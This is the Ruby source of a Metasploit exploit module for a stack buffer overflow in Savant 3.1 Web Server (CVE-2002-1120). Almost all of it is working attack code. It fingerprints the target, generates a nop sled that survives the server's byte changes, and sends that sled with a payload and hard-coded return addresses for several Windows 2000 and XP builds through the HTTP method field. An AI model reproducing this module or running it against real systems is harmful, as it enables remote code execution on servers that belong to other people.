Savant 3.1 Web Server Overflow

`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GreatRanking  
  
HttpFingerprint = { :pattern => [ /Savant\/3\.1/ ] }  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Savant 3.1 Web Server Overflow',  
'Description' => %q{  
This module exploits a stack buffer overflow in Savant 3.1 Web Server. The service  
supports a maximum of 10 threads (for a default install). Each exploit attempt  
generally causes a thread to die whether sucessful or not. Therefore, in a default  
configuration, you only have 10 chances.  
  
Due to the limited space available for the payload in this exploit module, use of the  
"ord" payloads is recommended.  
},  
'Author' => [ 'patrick' ],  
'Arch' => [ ARCH_X86 ],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2002-1120' ],  
[ 'OSVDB', '9829' ],  
[ 'BID', '5686' ],  
[ 'EDB', '787' ]  
],  
'Privileged' => false,  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread',  
},  
'Payload' =>  
{  
'Space' => 253,  
'BadChars' => "\x00\x0a\x0d\x25",  
'StackAdjustment' => -3500,  
'Compat' =>  
{  
'ConnectionType' => '+ws2ord',  
},  
},  
'Platform' => ['win'],  
'Targets' =>  
[  
# Patrick - Tested OK 2007/08/08 : w2ksp0, w2ksp4, xpsp2 en.  
[ 'Universal Savant.exe', { 'Ret' => 0x00417a96 } ], # p/r Savant.exe  
[ 'Windows 2000 Pro All - English', { 'Ret' => 0x750211aa } ], # p/r ws2help.dll  
[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2ac5 } ], # p/r ws2help.dll  
[ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa36b2 } ], # p/r ws2help.dll  
[ 'Windows XP Pro SP2 - English', { 'Ret' => 0x71ab76ed } ], # p/r ws2help.dll  
],  
'DisclosureDate' => 'Sep 10 2002',  
'DefaultTarget' => 0))  
end  
  
def check  
info = http_fingerprint # check method  
if info and (info =~ /Savant\/3\.1/)  
return Exploit::CheckCode::Appears  
end  
Exploit::CheckCode::Safe  
end  
  
  
def safe_nops(count)  
# We need to find a safe nop combination.  
# Savant will change some chars in the http method type - anything before the "/".  
#  
# For example, "GET /" will remain "GET /", however  
# "\xe0 /" will be modified to "\xc0 /" ...  
# "\xfe /" will be modified to "\xde /" ...  
# "\xff /" will be modified to "\x9f /"  
# The code after the "/" - our payload - is unchanged >=)  
#  
# Savant bad_chars for the nops  
  
bad_nop_chars = [*(0xe0..0xff)].pack("C*")  
  
nopsled = make_nops(count) # make_nops includes the payload bad_chars  
bad_nop_chars.each_byte { |badbyte|  
nopsled.each_byte { |goodbyte|  
if (goodbyte == badbyte)  
return false  
end  
}  
}  
return nopsled  
end  
  
  
def exploit  
print_status("Searching for a suitable nopsled...")  
findnop = safe_nops(24) # If we use short jump or make_nops(), sled will be corrupted.  
until findnop  
findnop = safe_nops(24) # If nops are banned, generate a new batch.  
end  
  
print_status("Found one! Sending exploit.")  
sploit = findnop + " /" + payload.encoded + [target['Ret']].pack('V')  
res = send_request_raw(  
{  
'method' => sploit,  
'uri' => '/'  
}, 5)  
if (res)  
print_error('The server responded, that can\'t be good.')  
end  
  
handler  
end  
  
end  
`